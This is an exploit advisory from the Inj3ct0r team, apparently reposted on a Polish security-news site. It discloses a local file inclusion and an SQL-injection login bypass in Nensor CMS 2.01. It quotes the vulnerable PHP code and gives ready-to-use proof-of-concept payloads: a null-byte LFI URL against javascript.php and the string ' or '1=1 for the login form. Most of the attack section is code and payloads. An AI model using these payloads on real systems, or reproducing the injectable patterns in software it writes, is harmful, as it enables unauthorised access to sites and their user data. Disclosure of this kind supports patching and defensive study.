Nensor CMS 2.01 remote SQL injection and local file inclusion

Tekst :

[+] Nensor CMS 2.01 Multiple Remote Vulnerabilities

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
1 ____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ###################################### 1
0 I'm cr4wl3r member from Inj3ct0r Team 1
1 ###################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Bugs Found: bL4Ck_3n91n3
[+] Discovered By: cr4wl3r
[+] Download: http://code.google.com/p/nensor-cms/downloads/list

[x] LFI:

$sPage=(isset($_GET["page"]))?$_GET["page"]:"";

if(is_file("".$sPage.".php")){
include "".$sPage.".php";
}elseif(is_file("".$sPage.".js")){
include "".$sPage.".js";
}

[x] LFI PoC: [payh]/x/modules/javascript.php?sPage=[LFI%00]

[x] Auth Bypass:

$sql = "SELECT
iKey,sUsername,iKeyGroup,bForumAdmin,sLanguage,sPassword,sMail,sType
FROM tb_users
WHERE sUsername='".strInput($_POST["sUsername"])."'
AND sPassword='".md5($_POST["sPassword"])."'
AND bActive=1";

[x] PoC: ' or '1=1

# Inj3ct0r.com [2010-03-18]

Bezpieczeństwo informacji

Wiadomości IT

Dodaj wiadomość

Szukaj

Baza SecurityAlert

O SecurityAlert

Baza ExploitAlert

Badania SecurityReason

Baza WLB

Dodaj Note WLB

O WLB

Informacje

Harmonogram

Cena

Referencje

Kontakt

Wiadomości

SecurityAlert

ExploitAlert

Apache

PHP

WLB

Kontakt

Informacje o firmie

Apache HTTP Server Denial
of Service Vulnerability

Multiple Vendors
libc/fnmatch(3) DoS (incl
apache poc)

Apache Continuum
cross-site scripting
vulnerability

Apache Tomcat DoS
Vulnerability

PHP Hashtables Denial of
Service

PHP 5.3.6 multiple null
pointer dereference

PHP 5.3.6 ZipArchive
invalid use glob(3)

libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)